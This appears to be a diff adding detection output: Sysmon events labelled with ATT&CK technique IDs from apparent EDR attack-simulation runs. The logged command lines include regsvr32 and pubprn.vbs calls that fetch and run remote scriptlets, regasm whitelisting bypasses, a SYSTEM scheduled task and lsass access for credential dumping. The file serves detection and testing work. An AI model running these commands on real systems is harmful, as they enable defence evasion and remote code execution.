+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4929
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:44.204
+ 747F3D96-6638-5D3F-0000-00103DA88900
+ 1652
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 27334
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-04-25 22:19:01.724
+ 747F3D96-B755-5EA4-0000-0010D06E2500
+ 4484
+ C:\Windows\System32\svchost.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-3384-5EA5-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
+ 00000000-0000-0000-0000-000000000000
+ 596
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966368
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:48:33.279
+ 365ABB72-55A1-5C91-0000-0010AB8C0700
+ 2112
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4926
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:39.223
+ 747F3D96-6633-5D3F-0000-001092628900
+ 5056
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4925
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:39.152
+ 747F3D96-6633-5D3F-0000-001051608900
+ 4092
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436085.311645,2019-07-30T01:34:45.311645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5004
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:45.198
+ 747F3D96-6675-5D3F-0000-0010AA498F00
+ 4184
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5002
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Persistence - Scheduled Task Management
+ 2019-07-29 21:34:40.755
+ 747F3D96-6670-5D3F-0000-0010F9148F00
+ 7076
+ C:\Windows\System32\schtasks.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Task Scheduler Configuration Tool
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
+ 747F3D96-6670-5D3F-0000-001099048F00
+ 2916
+ C:\Windows\System32\cmd.exe
+ cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966330
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:42:38.043
+ 365ABB72-543E-5C91-0000-001009C90300
+ 3068
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /c msg * "hello from run key"
+ C:\Windows\system32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-543D-5C91-0000-001099A60300
+ 2984
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"
+
+
+
+
+ 10
+ 3
+ 4
+ 10
+ 0
+ 0x8000000000000000
+
+
+ 8341
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 07:23:00.883
+ 365ABB72-F7C9-5CC7-0000-0010BF010E00
+ 3772
+ 1088
+ D:\m.exe
+ 365ABB72-F6A1-5CC7-0000-001072590000
+ 492
+ C:\Windows\system32\lsass.exe
+ 0x1410
+ C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5000
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:40.243
+ 747F3D96-6670-5D3F-0000-001099048F00
+ 2916
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4998
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:36.528
+ 747F3D96-666C-5D3F-0000-00104BB78E00
+ 3872
+ C:\Windows\System32\calc.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Calculator
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ calc
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
+ 747F3D96-6642-5D3F-0000-001044A68A00
+ 2996
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 27803
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-04-25 22:19:27.149
+ 747F3D96-B76F-5EA4-0000-0010624D0600
+ 5840
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-B767-5EA4-0000-00209BD30100
+ 0x1d39b
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-B769-5EA4-0000-001000800300
+ 4472
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4998
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:36.528
+ 747F3D96-666C-5D3F-0000-00104BB78E00
+ 3872
+ C:\Windows\System32\calc.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Calculator
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ calc
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
+ 747F3D96-6642-5D3F-0000-001044A68A00
+ 2996
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 27803
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-04-25 22:19:27.149
+ 747F3D96-B76F-5EA4-0000-0010624D0600
+ 5840
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-B767-5EA4-0000-00209BD30100
+ 0x1d39b
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-B769-5EA4-0000-001000800300
+ 4472
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 27803
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-04-25 22:19:27.149
+ 747F3D96-B76F-5EA4-0000-0010624D0600
+ 5840
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-B767-5EA4-0000-00209BD30100
+ 0x1d39b
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-B769-5EA4-0000-001000800300
+ 4472
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4994
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:35.763
+ 747F3D96-666B-5D3F-0000-0010EF858E00
+ 264
+ C:\Windows\System32\cscript.exe
+ 5.812.10240.16384
+ Microsoft ® Console Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
+ 747F3D96-666B-5D3F-0000-001033648E00
+ 1580
+ C:\Windows\System32\cmd.exe
+ cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4994
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:35.763
+ 747F3D96-666B-5D3F-0000-0010EF858E00
+ 264
+ C:\Windows\System32\cscript.exe
+ 5.812.10240.16384
+ Microsoft ® Console Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
+ 747F3D96-666B-5D3F-0000-001033648E00
+ 1580
+ C:\Windows\System32\cmd.exe
+ cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4993
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:35.663
+ 747F3D96-666B-5D3F-0000-00102F7F8E00
+ 3224
+ C:\Windows\System32\cscript.exe
+ 5.812.10240.16384
+ Microsoft ® Console Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
+ 747F3D96-666B-5D3F-0000-001051638E00
+ 5840
+ C:\Windows\System32\cmd.exe
+ cmd /c winrm qc -q
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4991
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:35.285
+ 747F3D96-666B-5D3F-0000-001033648E00
+ 1580
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4991
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:35.285
+ 747F3D96-666B-5D3F-0000-001033648E00
+ 1580
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
